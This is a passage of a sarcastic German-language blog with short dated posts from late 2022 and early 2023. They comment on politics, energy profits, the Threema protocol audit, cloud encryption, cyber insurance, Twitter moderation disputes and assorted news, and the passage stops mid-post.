Erinnert ihr euch noch, wie das bei Merkel als Zeichen für eine Führung mit ruhiger Hand galt, wenn sie jahrelang Entscheidungen vertagt hat, bis es nur noch einen möglichen Weg gab?
Vergleicht das mal damit, was der Scholz sich anhören musste, er sei ein Zauderer.
Mann ist das alles ein verlogener Haufen von Laiendarstellern immer.

Sat Feb 11 2023

[l] An der Englischen Ostküste ist eine deutsche Weltkriegsbombe beim Entschärfversuch hochgegangen. Eine Polizeidrohne hat ein Video davon gemacht.
In Berlin werden ja auch alle Nase lang Weltkriegsbomben gefunden und entschärft, aber weil das bislang immer ohne Explosion im Stadtzentrum gelang, hat man als Anwohner wenig Gefühl dafür, wieviel Wumms so eine Fliegerbombe eigentlich hat.
Bemerkenswerterweise ist bei der Explosion niemand verletzt worden. Die Briten sind da sehr sorgfältig rangegangen und haben eine Sandbarriere gebaut, die man ganz am Anfang von dem Video gut sehen kann. Die fängt dann die kinetische Energie der Explosion auf.
Bei der Explosion sieht man dann nach unten hin dunklen Rauch und nach oben hin hellbraunen Sand.

Sun Feb 5 2023

[l] Wie schlimm ist die Lage? So schlimm: Italien wird von fiesen Hackern heimgesucht!1!!
Money Quote:
The hacking attack sought to exploit a software vulnerability, ACN director general Roberto Baldoni told Reuters, adding it was on a massive scale.
Ja wie, Moment, da steht ja gar nichts von riesiger krimineller Energie?! Immerhin haben Sie die Behörden eingeschaltet. Das hilft auch immer gewaltig, wenn man nicht gepatcht hat und ungebetenen Besuch kriegt.
Was tun die denn konkret, fragt ihr euch bestimmt. Nun: Gar nichts.
"CISA is working with our public and private sector partners to assess the impacts of these reported incidents and providing assistance where needed,"
Die sitzen da und sammeln Daten. Mit denen sie dann absolut gar nichts anfangen können beim nächsten Mal. Aber "wir haben auf unseren fetten Ärschen gesessen und waren komplett nutzlos" kann man ja nicht sagen. Daher sagt man "working with our partner" und "assess the impact".
Ich tippe ja, dass das eine uralte bekannte Lücke ist, gegen die man seit Ewigkeiten patchen konnte, aber das hat wieder keiner gemacht. Shitrix oder so. Vielleicht das ESXi-Ding. Oder log4j.
Je älter ich werde, desto mehr glaube ich, dass das alles mal kontrolliert niederbrennen muss. Wobei. Genau das passiert ja gerade. Nur halt eher langsam.
Ich würden den Italienern ja raten, dass die Industrie eine Versicherung gründet. Dann muss weiterhin niemand patchen. Man ist ja versichert.
Update: Es ist das ESXi-Ding.

Thu Feb 2 2023

[l] Kommen wir zu den Wirtschaftsnachrichten.
Shell hat 40 Milliarden Jahresprofit gemacht. Das ist eine Verdopplung.
Nur falls jemand dachte, wir hätten hier ein Problem mit "Inflation" und "Angebotsverknappung". Nein, haben wir nicht. Wir haben ein Problem mit gierigen Energiekonzernen.
Update: Exxon hat auch blendende Profite gemacht und obendrauf noch Milliarden in staatlichen Subventionen und Bailouts eingesackt.
[l] In Deutschlands größtem Gasspeicher gab es eine Verpuffung. Der Artikel handelt vor allem davon, dass das keine Sabotage war, und dass die Versorgungssicherheit nicht gefährdet sei.
Hier ist das für mich interessanteste Detail:
Ein Abfließen von Gas sei theoretisch möglich, es gebe aber keine Nachfrage.
Der Speicher ist zu 90% gefüllt. Und es gibt keine Nachfrage. Nicht "voll wenig" Nachfrage. Keine Nachfrage.
Ja, äh, wofür haben wir dann so viel Terror gemacht, wenn es keine Nachfrage gibt? Der Winter ist gefühlt schon wieder fast vorbei und die Reserven sind bei 90%!?

Sun Jan 15 2023

[l] Falls ihr euch fragt, wieso uns eigentlich keine fortschrittlicheren Außerirdischen helfen, unsere selbstgemachte Klimakatastrophe zu überleben: Sie haben es versucht, aber Russland hat ihre UFOs abgeschossen, sagt diese superseriöse Publikation hier :-)
Und dann passierte folgendes:
This is not the first time alleged traces of extraterrestrial activity have been reported in Russia’s Rostov Oblast. In 2007, after a powerful storm, some fishermen along the Sea of Azov captured a strange, seemingly unexplained 100 kilograms of life form.
They thought the strange, squeaking creature they had captured on tape with a cellphone was some alien. However, before anyone could confirm these allegations, the Russian fishermen chose to consume this alleged alien, with one of them stating it was the tastiest food he had ever had.
Ja gut, nicht gerade der First Contact, den sich die Vulkanier erhofft hatten. (Danke, Rainer)

Thu Jan 12 2023

[l] Wo wir gerade bei Verkacken im Industriemaßstab waren: In der Ukraine gibt es Full HD Video Streaming aus der Bahn. Das weiß ich, weil die ARD das gerade für ein Baerbock-Interview gemacht hat.
Ja aber Fefe, höre ich euch fragen, ist in der Ukraine nicht gerade Krieg? Wieso kriegen die Full HD Video Streaming mit ihrem Bahn-Internet hin aber wir nicht?
Hmm, ob das was mit der Kompetenz der Bahn-Führung zu tun hat? Oder vielleicht dem Verkehrsministerium?

Tue Jan 10 2023

[l] Benutzt hier jemand Threema? Die Applied Cryptography Group der ETH Zürich hat mal das Protokoll analysiert und mehrere gravierende Schwachstellen gefunden.
Das ist bemerkenswert, denn Threema hat bereits mehrere Audits hinter sich. Die haben aber offenbar eher auf Code-Qualität als auf die Protokolle geguckt, jedenfalls haben die diese Probleme nicht gefunden.
Threema hat in der Zwischenzeit ein neues Protokoll ausgerollt, das Forward Secrecy für die E2E-Krypto schaffen soll. Das war aber noch nicht Teil dieses Audits, kann also auch noch Probleme dieses Kalibers haben.
Sehr schön finde ich, dass hier wirklich ein Audit des Protokolls durchgeführt wurde, nicht bloß jemand einen Fuzzer laufen gelassen hat, wie es heute üblich zu sein scheint, besonders in akademischen Umgebungen, wo man so schnell und leicht Papers und Aufmerksamkeit generieren kann.
Ich mag auch die Lessons Learned von dem Team, u.a. "ordentliche Crypto-Libraries wie NaCl nehmen macht noch kein sicheres Protokoll". Und dann kommt folgende Lektion, die ich sehr wichtig finde:
Proactive, not reactive security: our inability to find an attack on a protocol does not imply it is secure. New attacks could be found at any moment and known attacks only get stronger over time if left unaddressed. Often, secure systems and protocols follow a design-release-break-patch process (a reactive approach). This is inconvenient for users and often requires the maintenance of backwards compatibility. Developers should instead adopt a proactive approach, where the system or protocol is formally analyzed during the design stage.
Ob nun formale Beweisführung hilft, sei mal dahingestellt. Ich bin da eher zurückhaltend in meinen Erwartungen, denn wenn der Beweis komplexer ist als das Protokoll, wieso trauen wir dann dem Beweis, wenn wir dem Protokoll nicht getraut haben?
Aber dass man Dinge vielleicht mal vor dem Release ordentlich machen sollte, und nicht diesen agile "ja klar ist es Scheiße aber wir patchen dann halt die übelsten Wunden im Feld nach" hat jetzt meiner Meinung nach echt genug Schaden angerichtet und kann mal in Rente gehen.
Wenn ihr Papers lesen könnt, lest nicht nur die Webseite sondern auch das Paper. Die kryptografischen Fehler, die die gemacht haben, sollten alle in ihr Repertoire aufnehmen, damit die niemand nochmal macht. Threema hat eine Stellungnahme veröffentlicht, die so defensiv geschrieben ist, dass sie es schafft, den Laden noch schlechter aussehen zu lassen als er eh schon rüberkam. Sie hätten auch einfach sagen können: Die Findings sind valide, wir haben Fehler gemacht, und es tut uns leid. Wir geloben Besserung. Stattdessen lauter "das ist doch bloß theoretisch" und "das betrifft die aktuelle Version nicht" (die, die nach dem Melden dieser Lücken veröffentlicht wurde!).
Ich weiß nicht, wie ihr das seht, aber ich erwarte von meinem sicheren Messenger, dass der Hersteller nicht herumverhandelt und kleinredet, wenn Lücken gefunden werden, sondern die fixed und ein Post-Mortem veröffentlicht, wie das durch ihre QA kommen konnte.

Mon Jan 9 2023

[l] Ich krieg ja in letzter Zeit immer Kopfweh davon, wie offensichtlich bescheuert die Leute sind. Wenn das wenigstens Irrtümer auf einem Niveau wären, wo man irgendwas argumentieren kann. Aber nein!
Mein aktueller Endboss in Sachen offensichtlich bescheuerter IT-Homöopathie ist Cloud-Verschlüsselung.
OK, kurzes Gedankenspiel. Ihr fahrt in den Urlaub und bittet den Nachbarn, eure Pflanzen zu wässern. Dafür gebt ihr ihm den Schlüssel.
Euch ist hoffentlich direkt sofort klar, und zwar ohne dass ich das irgendwie erläutern muss, dass der Nachbar ab dann in eure Wohnung kommen und Dinge tun kann. Schlüssel zurückholen hilft nicht, denn er kann einen Nachschlüssel angefertigt haben.
Wenn du einmal den Schlüssel weggibst, hilft nur Schlosstausch.
Aber was machen die Cloud-Leute jetzt? Die haben ja das Problem, dass deine Software auf ihrer Hardware läuft, und Software kann sich gegen Angreifer mit physischem Zugriff auf die Hardware nicht schützen. Prinzipiell nicht. Nicht "wir wissen nicht wie". Doch. Wir wissen. Geht nicht.
Software ist eine Liste von Dingen. Die gibt man der Hardware, und die führt die dann aus. Wenn jemand anderes die Hardware kontrolliert, kontrolliert er deine Software.
Da führt auch kein Weg dran vorbei. Daher wird DRM immer wieder geknackt, und deshalb führen Intel und ARM einen Krieg gegen ihre Kunden und nehmen ihnen schrittweise immer mehr der Kontrolle über die Hardware weg.
Was machen also die Cloud-Leute? Sie verdünnen Wasser! Hey, wir haben hier einen Knopf hingemacht. "Verschlüsselung aktivieren". Das ist ungefähr wie am Set von Star Trek der Knopf "Schilde aktivieren". Das tut nichts und jeder weiß es. Da ist kein Schild. Wir tun nur alle so.
Während wir bei Star Trek wenigstens unterhalten werden, ist das bei der Cloud einfach nur Beschiss. Wenn die Cloud verschlüsselt, dann hat die Cloud den Schlüssel. Mit dem kann man Ver- und Entschlüsseln. Solange der Cloud-Anbieter den Schlüssel jemals irgendwann auch nur kurz gesehen hat, ist das kein Schutz gegen den Cloud-Anbieter, und als genau das wird das ja gerade verkauft.
OK Fefe, das hilft dann vielleicht nicht gegen den bösen Admin beim Cloud-Anbieter, aber es hilft doch gegen den chinesischen Hacker, der die Cloud hackt? Nein, tut es nicht, denn die Cloud entschlüsselt das ja für dich. Wenn der sich als du einloggen kann, oder dir eine SQL Injection oder sonst was unterschieben kann, dann hat der vollen Zugang, genau wie ohne Verschlüsselung.
OK, aber hilft das denn wenigstens gegen die Putzhilfe vom iranischen Geheimdienst, die das Tape mit dem Backup klaut? Ja, wenn der Schlüssel nicht auf dem Tape ist, was erschütternd häufig der Fall ist. Aber wir reden hier nicht von Tapes sondern von S3-Buckets gerade. Die hängen am Web. Wieso würde jemand alte Backups haben wollen, wenn er Echtzeitzugriff kriegen kann?
Lustigerweise gibt es wie bei Homöopathie mehrere Verdünnungsstandards. Einige Cloud-Anbieter haben bloß eine Checkbox "Verschlüsselung anschalten". Der Schlüssel kommt von denen und bleibt bei denen.
Andere Anbieter lassen dich den Schlüssel erzeugen und hochladen. Spielt keine Rolle, denn sie müssen den ja nur einmal für eine Nanosekunde gesehen haben.
Noch andere Anbieter lassen dich einen "Vault" installieren (lacht nicht, ist ein echter Produktname), und dann holt sich die Cloud immer von dem Vault den Schlüssel, wenn sie ihn braucht. Impliziert, dass sie den nicht aufheben, aber das weißt du halt nicht. Ist alles dieselbe Scheiße.
Das ist alles Bauernfängerei. Fallt da nicht drauf rein.
Faustregel: Wenn dein Code auf jemand anderes Hardware laufen lässt, oder deine Daten auf jemand anderes Hardware liegen, ist es nicht mehr dein Code, sind es nicht mehr deine Daten.

Wed Jan 4 2023

[l] Weil ja gerade mal wieder Wahlkampf ist, sind alle Parteien auf der Suche nach Inhalten, mit denen sie uns belügen können.
Besonders schwer hat es die SPD, denn die hat sich der Reihe nach ihre traditionellen Themen vergiftet.
Soziale Gerechtigkeit? Seit Hartz IV verbrannt.
Wirtschaftskompetenz hat denen eh noch nie jemand zugetraut.
Menschenrechte hat die Merkel geschickt zur CDU gezogen mit ihrem "wir schaffen das" und Flüchtlinge reinlassen.
Mieterschutz verkackt die SPD gerade in beeindruckendem Maßstab in Berlin, das taugt also auch nicht als Wahlkampfthema.
Tja, da wird die Luft langsam dünn für die SPD. So dünn, dass sie jetzt traditionelle CDU-Themen besetzen. Wir erleben hier also gerade die Vollendung einer schrittweisen Inversion. Früher stand die CDU für innere Sicherheit, Ausländerfeindlichkeit und Unmenschlichkeit, und die SPD für Menschenrechte, Schutz des kleinen Mannes, Humanismus.
Jetzt ist es umgekehrt. Die SPD stellt jetzt Kriegsministerium, Innenministerium und steht für Anti-Migranten-Rhetorik.
Dabei hat die Giffey extra ein paar verlogene Photo-OPs am Bahnhof gemacht, mit Ukraine-Flüchtlingen. Als dann jemand die freiwilligen Helfer dazu befragt hat, mussten weitere solcher Aktionen abgesagt werden, weil das einfach zu peinlich für die SPD war.
Tsja. In diesem Sinne. SPD, die Partei von Polizeistaat und Ausländerbashing. Wer wählt die eigentlich immer?!
Update: Alternativer Erklärungsversuch: Die Opposition ist halt immer dagegen, weil sie die Opposition sind. Die SPD war nie sozial, die war nur jahrelang in der Opposition, als die CDU soziale Kälte umgesetzt hat. Das erste Mal, als sie Entscheidungsbefugnis hatten, haben sie die CDU knallhart rechts überholt und Hartz IV gemacht.

Tue Dec 27 2022

[l] Ui, das ging ja schneller als ich dachte: Die Rückversicherungen wedeln bezüglich Cyberversicherungen die weiße Fahne. Money Quote:
Im Unterschied zu Naturkatastrophen seien Cyberangriffe bald nicht mehr versicherbar. Davor warnte Mario Greco, Vorstandschef der Schweizer Versicherungsgesellschaft Zurich Insurance, in der Financial Times.
Na also.
Hey, warte, was schlägt er denn vor, was jetzt passieren soll? Festhalten!
Greco sagte, es gebe eine Grenze, bis zu der der private Sektor alle durch Cyberangriffe verursachten Verluste übernehmen könne. Er forderte die Regierungen auf, "privat-öffentliche Systeme zu schaffen, um systemische Cyberrisiken zu handhaben, die nicht quantifiziert werden können, ähnlich denen, die in einigen Ländern für Erdbeben oder Terroranschläge existieren".
NEIN!! Der Staat soll die Kosten für das Totalversagen der Industrie in Sachen Cyber-Security tragen? Der Steuerzahler?!?
Ja klar haben wir hier simpelste offensichtliche Maßnahmen nicht gemacht, die jetzt Milliardenschäden ermöglicht haben. Aber das heißt doch nicht, dass ich in den Knast sollte? Das soll lieber der Steuerzahler zahlen!1!!
Auf der anderen Seite sind wir ja aus dem Zeitalter der Vorsorge raus. Lagerhaltung macht keiner mehr, die Renten sind kollabiert, regelmäßig lösen gammelige Produkte Personenschaden aus. Das ist jetzt halt so.
Und hey, wenn die anderen billiger produzieren können, indem sie Menschenleben gefährden, dann mach ich das natürlich auch!1!!
Ich bin an der Stelle ja Marktfundamentalist. Ich will die Welt brennen sehen. Die Firmen, die ihre Security verkackt haben, müssen dafür dann halt pleite gehen, und zwar mit der Geschäftsführung und dem Aufsichtsrat in der persönlichen Haftung. Die darf man doch nicht noch retten! Die müssen alle niederbrennen! Jede einzelne von denen.
Am besten gleich mit Haftstrafen für krasse Fälle wie z.B. bei Autos oder Kraftwerkssteuerungen.

Fri Dec 16 2022

[l] Es gab doch einen Typen, er aus der öffentlichen Datenbank der Flugzeug-Kennzeichen Elon Musks Privatjet gescraped und regelmäßige Updates mit der aktuellen Position auf Twitter gepostet hat.
Der Account hieß ElonJet.
Den hat Elon, äh, Twitter jetzt zugemacht. Daraufhin ging der zu Mastodon.
Daraufhin hat Twitter den Mastodon-Account gesperrt und gleich noch einen Haufen Journalisten, die darüber berichtet und den ElonJet-Account verlinkt hatten.
Elon Musk hat jetzt angesagt, dass das Vorsatz war, und das aus seiner Sicht Doxxing war, was dieser Account gemacht hat, und die Regeln gelten halt auch für Journalisten.

Thu Dec 15 2022

[l] Dass du eine Schmutzwerfkampagne nicht durch Inhalte-Löschen wegkriegst, hat sich inzwischen herumgesprochen. Sag ich ja seit Jahren.
Aber was folgt daraus? Es nicht mehr machen, weil es sinnlos ist? Lieber die Täter verfolgen? Nein, nicht doch! Man findet einfach einen uninformierten Richter in Frankfurt, und der sagt dann einfach: Twitter hätte auch "kerngleiche" Aussagen anderer finden und löschen müssen.
Nur dass wir hier mal eines ganz klar ansagen: Der Staat hat die Aufgabe, sowas zu ahnden. Nicht Twitter. Der Staat war 20 Jahre lang besoffen am Steuer, fuhr gegen einen Baum, und sitzt seit dem tatenlos in der Ausnüchterungszelle. Dort hat er auf den Boden gekotzt und gekackt und jetzt sagt er einfach: Twitter soll das wegmachen. In der Schule hat man dafür die Note 6 eingeführt. Nicht nachweisbare Leistung.
Wie soll Twitter das anstellen? Eine "kerngleiche Aussage" zu finden ist ein ungelöstes Problem! Das gelingt nicht mal ausgebildeten Menschen zuverlässig! Das wird hier einfach im Nebensatz von Twitter gefordert?! Beispiel: "Friedhelm hat pädophile Tendenzen" wäre eine ehrverletzende Aussage, die zu entfernen wäre. "Friedhelm mag kleine Kinder" ist je nach Kontext dieselbe Aussage. Der Interpretationsspielraum ist beliebig ausweitbar.
Oder man könnte einen Code machen, wie das ja unter Nazis angeblich üblich ist, "18" als Chiffre für "Adolf Hitler" (nach der Position der Anfangsbuchstaben im Alphabet). Was wenn sich jetzt die Gruppe einigt, "FPT" zu tweeten? Einfach die Anfangsbuchstaben nehmen. Alle wissen, was und wer gemeint ist, aber der Name taucht nicht auf.
Der Richter hat keinen Bock, such auch nur oberflächlich mit dem Thema zu beschäftigen, und sagt einfach: Nicht mein Problem. Twitters Problem.
Liebe Leute, abstrahiert das mal bitte gedanklich von Twitter. Das trifft eure tolle neue Mastodon-Instanz genau so. Nur weil Twitter scheiße ist und alle plötzlich merken, dass Twitter Scheiße ist, heißt das nicht, dass eine Regel gegen Twitter eine gute Idee ist.
Ich zitiere mal, was das Gericht zu seiner Verteidigung zu sagen hat:
Betroffen davon seien nur solche Kommentare, "die als gleichwertig anzusehen sind" trotz gewisser Abweichungen. Die Überwachungspflicht gilt dem Urteil (Az.: 2-03 O 325/22) zufolge unabhängig davon, von wem die Äußerung stammt. Entscheidend für den rechtsverletzenden Charakter seien der Inhalt und der Kontext, nicht das genutzte Konto. Sonst könnte die Auflage leicht umgangen werden.
JA GENAU, IHR SPEZIALEXPERTEN! "Löschen" und "sperren" war schon immer eine völlig bekloppte Idee. Und wisst ihr, wessen Idee das war? Nicht Elon Musks. EURE! Aber auf mich hört ja keiner.
Anstatt das jetzt einzugestehen, dass man jahrelang keinen Bock hatte, sich mit dem Thema zu beschäftigen, und Mist entschieden hat, fordert man jetzt einfach unerfüllbare Dinge von Twitter, weil Twitter ist ja eh unbeliebt. Soll der Elon halt mal forschen und so.
Das ist ungefähr so sinnvoll wie ein Gesetz, das dem Fluss Hochwasser untersagt. Absolut bescheuert.
Update: Habe mich mit ein paar Kumpels dazu unterhalten, und die lesen das anders. Die meinen, dass Twitter zwei inhaltlich identische Tweets von derselben Person gemeldet bekommen hat und dann nur den einen weggemacht hat. Dass es also auch hier um Notice & Takedown geht, nicht um "Twitter soll vorauseilend Tweets löschen". Sie stützen sich dabei auf den Satz, dass der Richter gesagt haben soll, es gehen eben nicht um alle zig Millionen User auf Twitter. Den hatte ich gesehen und als Zeichen für das Unverständnis des Richters gesehen, weil der Rest eben so klang, als ging es genau darum. Na mal gucken, was noch an Details rauskommt.

Thu Dec 8 2022

[l] Die USA haben mit Russland einen Gefangenenaustausch gemacht. Die Amis bekamen Brittney Griner wieder, das war die Basketballspielerin, die in Russland wegen ein paar Gramm Gras verhaftet wurde, und die Russen kriegen Wiktor But zurück, den notorischsten Waffenhändler der Neuzeit und "wahre Geschichte" hinter mindestens einem Hollywood-Blockbuster.
Ich glaube wir haben es hier auf beiden Seiten mit "we leave nobody behind"-Signalling zu tun. Die Russen brauchen den But nicht, und aus Sicht der Amis hätte But viel wichtiger sein sollen als die Griner.
Aber so konnte Putin zeigen, dass selbst üble Waffendealer heimgeholt werden, und der Biden konnte eine junge farbige Frau retten. Oh und lesbisch ist sie auch noch. Hattrick!!

Wed Dec 7 2022

[l] Jetzt kommen hier lauter Hinweise auf Laptops rein. Nee, Leute, ich hatte da schon sehr spezifische Anforderungen.
Hauptanforderungen waren:
1. Aktuelle Ryzen-Reihe, weil die angeblich so große Schritte in Sachen Stromverbrauch gemacht haben.
2. Diskrete GPU, falls ich mal wieder nen Vierteljahr auf Geschäftsreise in irgendeinem gammligen Hotel übernachte. Da will ich dann wenigstens zocken können abends.
Der Rest war verhandelbar. Und da möchte ich dann bitte ordentliche Akkulaufzeit sehen, wenn ich gerade keine 3d-Grafik mache.
Tuxedo kann keine aktuellen Ryzens, Schenker auch nicht.
Sekundäranforderung war, dass ich nie wieder Nvidia Geld in den Rachen werfen wollte, aber da hätte ich mich von abbringen lassen, wenn der Rest wirklich unfassbar großartig gewesen wäre. War er aber nirgendwo.
Dass Asus keinen guten Ruf hat, müsst ihr mir nicht erklären. Das Zephyrus ist angeblich nicht von Asus sondern von AMD gebaut worden, die damit zeigen wollten, dass auch sie eine wirklich überzeugende Plattform hinkriegen. Ist ja auch eigentlich ziemlich coole Scheiße, was die da in Sachung Performance und Kühlung hingekriegt haben. Müsste jetzt nur noch zuverlässig funktionieren, auch unter Linux.
[l] Noch ein Leserbrief zur Behördendigitalisierung:
das erklärt dann vermutlich die Antwort auf meinen Kindergeldantrag.
Während die Arbeitsagentur hier schreibt, dass "der Antrag somit vollständig digital gestellt werden" könne ("vollständig digital" fett geschrieben), das ELSTER-Zertifikat die Unterschrift ersetze sowie kein Ausdruck mehr erforderlich sei, bekam ich von der Familienkasse Hessen die Rückmeldung, dass auf meinem Antrag, den ich per Elster eingereicht hatte, die Unterschrift fehle, man den Ausdruck beigelegt habe und ich ihn nochmals komplett ausfüllen und unterschrieben postalisch zurücksenden solle.
Nach mehrfachen Rückfragen, hat man mir telefonisch bestätigt, dass jemand einen Fehler gemacht habe und mein Antrag nun bewilligt wird.
Ich nehme nun an, hier wurden einfach digitale Anträge ausgedruckt und mit den postalischen Anträgen vermischt.

Mon Dec 5 2022

[l] Noch ein Nachgedanke dazu, dass wir die Machtergreifung der AI Overlords vielleicht sabotieren können, indem wir ihre Trainingsdaten jetzt mit Müll fluten.
Nach dem Siegeszug von MP3 hat man in Hörtests eine faszinierende Beobachtung gemacht. Die Jugendlichen, die mit mp3 aufgewachsen waren, hielten in Hörtests die mit mp3 komprimierte Version für besser. Die hatten sich an die Artefakte gewöhnt.
Ich befürchte jetzt, dass wir bei der sich schon abzeichnenden KI-Flutung unseres Wahrnehmungsraumes einen ähnlichen Effekt haben werden. KIs mit Müll fluten ist gleichzeitig auch ein Angriff auf uns selbst, den ner zerstört auch unsere eigenen Traditionen und Spracharchive. Leute können sich heute schon kaum noch gewählt ausdrücken.

Fri Dec 2 2022

[l] Datenreichtum bei den Plattform Signing Keys von Android. Da sind ein paar weggekommen und signieren jetzt Malware.
Ja ist ja komisch! Ist ja fast als wäre Code Signing bloß Schlangenöl!?
Also das ist ja wohl mal ein klarer Fall, wo wir jemanden gebraucht hätten, der uns da rechtzeitig warnt!
Ist doch immer dasselbe. Es wurden schon alle Fehler gemacht, nur noch nicht von jedem. Erfahrung ist, wenn du die Fehler wiedererkennst, die du machst.

Thu Dec 1 2022

[l] New York sucht einen Rattenfänger und hat eine sehr lustige Stellenausschreibung dazu gemacht. Stellt euch das mit mit der Stimme eines 1950er-Nachrichtensprechers vor. :-)
[l] Neulich vor dem Amtsgericht Tiergarten gab es eine Verhandlung gegen einen Letzte-Generation-Klimaaktivisten. Man stelle sich die Verwunderung vor, als er als seinen Verteidiger Gregor Gysi mitbrachte, der da erstmal eine schöne Rede hielt :-)
Gysi kündigte Rechtsmittel gegen die Entscheidung an - "es geht hier um Grundfragen". In seinem Plädoyer hatte er gefordert: "Sie sollten den Mut haben, ihn freizusprechen." Der Angeklagte habe gestört, "weil er Angst hat". Die Wut von Autofahrern, die von verursachten Staus betroffen sind, könne er verstehen, so Gysi. Im Kern sei es eine Spontandemonstration. Das Versammlungsrecht habe "Vorrang vor dem Recht, sich mit dem Auto irgendwo hinzubewegen". Sein Mandant habe sich nicht strafbar gemacht - "Dasitzen ist keine Gewalt".
Das haben die am Amtsgericht bestimmt nicht alle Tage. :-)
[l] Der Guardian über den Staatsbesuch von Macron in Washington.
Sowas ist normalerweise ein ritualisierter Tanz, Monate in Planung, bei dem man peinlichst darauf achtet, keine missverständlichen Dinge zu tun, die irgendwie als herabwürdigend empfunden oder interpretiert werden können. Bei Gastgeschenken guckt man, ob man nicht an irgendeine gemeinsame Sache erinnern kann. Die Franzosen z.B. haben das hier mitgebracht:
Paris has announced that he will present Biden with the cup from Christofle, the high-end tableware and jewellery company that supplied the prestigious cruise liner Normandie, among other things.
As such, it is a reference to the transatlantic relationship. The first voyage of the French ship to New York was an international triumph in 1935.
Sehr schön. Professionell gemacht. So muss das sein.
Und was machen die Amis? Nun, es geht mit dem Essen los.
But the first lady particularly insisted on serving American cheeses, including a blue cheese from north-western Oregon that was the first American product to win the world cheese championships, in 2019.
Äh... das ist schonmal gar nicht gut. Das ist ein Affront. Schau her, wir haben euch besiegt MWAHAHAHAHA! Sowas macht man nicht, schon gar nicht bei diplomatischen Empfängen schon extra nicht bei einem Staatsbesuch.
Ach komm, Fefe, Madame Biden ist vielleicht schon ein bisschen tatterich und verwirrt und ist hier ein bisschen auf dem diplomatischen Parkett ins Rutschen gekommen. Versehen! Schwamm drüber. Naja, äh, nee!
The toasts will be served with an American sparkling wine – though in glasses made in France.
Den Franzosen amerikanischen Sekt einschänken, auch noch in ihren eigenen Champagnergläsern! Das wird ja immer übler!
And the evening will be hosted by Jon Batiste, the jazz musician from Louisiana, the former province ceded by France to the US, which Macron will visit on Friday.
OK also das erschüttert mich jetzt, muss ich euch sagen. Ich wusste ja, dass es da Differenzen gibt zwischen den Regierungen, aber das ist ja geradezu eine Eiszeit, was wir hier sehen! Da behandeln die Amerikaner ja die Russen besser!
Krass.

Wed Nov 23 2022

[l] Die Deutschen WM-Spieler halten sich symbolisch den Mund zu.
Na DENEN haben wir es aber mal gezeigt, den Drecks-Nordkoreanern!
Hey, wenn wir die so abstoßend findet, wieso tretet ihr dann überhaupt an? Wieso berichtet unsere Presse überhaupt über den Zirkus, wenn da alle dagegen sind?
Ich persönlich habe mich noch nie für Fußball interessiert und für mich sieht das alles wie ein großes Kasperletheater aus. Alle suchen händeringend nach Gesten, mit denen sie zuhause signalisieren können, wie doll auf der richtigen Seite sie stehen. Eine hohle Geste nach der nächsten.
Hattet ihr das mit dem in Regenbogenfarben angemalten Flugzeug gehört? Das hier mit großem Tamtam abflog, von wegen den Kataris zeigen wir es jetzt aber? Und dann kam raus, dass das in den Oman flog und ab da sind sie mit einem unbemalten Flugzeug weitergeflogen nach Katar?
Ich persönlich finde das ja gut, dass sich die FIFA hier so zerlegt. Das hätten Aktivisten von außen gar nicht besser orchestrieren können. Die sollen alle in der Bedeutungslosigkeit verschwinden, wenn es nach mir ginge.
Update: Anscheinend ist der Teil mit dem Oman eine Ente und die Regenbogen-Maschine ist doch in Doha gelandet.
[l] Das Bürgeramt in der Klosterstraße hat gerade ein paar operationelle Unwägbarkeiten:
Hinweise zur Anschrift des Standorts
[...]
Das Bürgeramt befindet sich in der 1. Etage und ist nur über den Aufzug erreichbar.
Und dann, weiter unten:
Sonstige Hinweise zum Standort
Bitte beachten Sie:
Aktuell sind beide Aufzüge innerhalb dieses Dienstgebäudes außer Betrieb. Ein barrierefreier Zugang zum Bürgeramt ist daher momentan nicht möglich! Über die Dauer der Reparaturarbeiten können derzeit keine Angaben gemacht werden!
Um das Bürgeramt zu erreichen, springen Sie am besten mit einem Fallschirm ab, landen auf dem Dach und von dort seilen Sie sich dann ab.

Tue Nov 22 2022

[l] Falls ihr euch auch gefragt habt, wieso Twitter noch läuft, nachdem Elon Musk da Kahlschlag gemacht hat: Hier beschreibt einer von deren Ingenieuren, was sie so gebaut haben, damit die Site auch ohne menschliche Interaktion durchläuft.

Mon Nov 21 2022

[l] Wie kann das eigentlich sein, dass so Crypto-Scammer erst Milliarden-Businesses werden, bevor sie platzen, und dann alle ... überrascht sind?!
Nun, da gibt es eine ganz einfache Erklärung für, die man schöner gar nicht auf den Punkt bringen kann:
While Crypto Bro Scammed Clients, Reporters Scammed Readers
Genau so sieht es nämlich aus. Nicht nur die Regulierungsbehörden sind zuständig. Auch die Presse hat die Verantwortung, Scams aufzudecken und vor ihnen zu warnen.
Stattdessen hat sich die Presse großflächig von den Crypto Bros zu Schnittchen und Schampus einladen lassen, zu "Presse-Events" auf den Bahamas oder anderen schön warmen Inseln in der Sonne. Und dann haben sie Werbung für die Crypto-Bros gemacht.
Eine absolute Schande, was für ein Totalausfall der Finanzjournalismus ist, und nicht nur bei den Crypto-Bros!

Thu Nov 17 2022

[l] Die Bahn verteuert dann mal Güterverkehr um 45%.
Verkehrswende, wir kommen!
Ich glaube ja, das hat die Bahn gemacht, um endlich wieder freie Schienen zu haben. Anders schaffen sie das 49€-Ticket nicht!1!!

Fri Nov 4 2022

[l] Arne "Cyberclown" Schönbohm klagt gegen seine Abberufung. Die konnten ihn ja nicht feuern aus irgendwelchen lächerlichen bürokratischen Gründen, also haben sie ihm verboten, seinen Job auszuüben. Aber weil sie ihn nicht feuern konnten, wird er weiter voll bezahlt.
Andere Leute hätten die Füße hochgelegt und sich einen Caipirinha gemacht, aber nicht der Schönbohm.
Das ist alles so eine Seifenoper. Mann Mann Mann.

Sun Oct 30 2022

[l] Für den Getreideexport aus der Ukraine haben sich ja Russland und die Ukraine auf einen Seekorridor geeinigt, durch den zivile Frachtschiffe Getreide exportieren dürfen, im Schwarzmeer.
Die Russen sagen, sie werden von "zivilen" "Frachtschiffen" aus dem Korridor mit Drohnen angegriffen. Daher kündigen sie jetzt einseitig den Vertrag auf.
Aber wartet, das war noch nicht, warum ich das hier verlinke.
Der russische Agrarminister Dmitri Patruschew erklärte nun, sein Land sei bereit, arme Länder in den kommenden vier Monaten mit insgesamt 500.000 Tonnen Getreide zu versorgen. „In Anbetracht der diesjährigen Ernte ist die Russische Föderation vollumfänglich bereit, ukrainisches Getreide zu ersetzen und mit erschwinglichen Preisen alle daran interessierten Länder zu beliefern“, sagte Patruschew.
Ah, die Ernte, ja? Soso, die Ernte. Überraschend gut, war die Ernte, ja? LOL!
Aber wartet, das war auch noch nicht, wieso ich das hier verlinkt habe.
Am Rande gibt es hier noch ein paar Vorwürfe gegen die Briten:
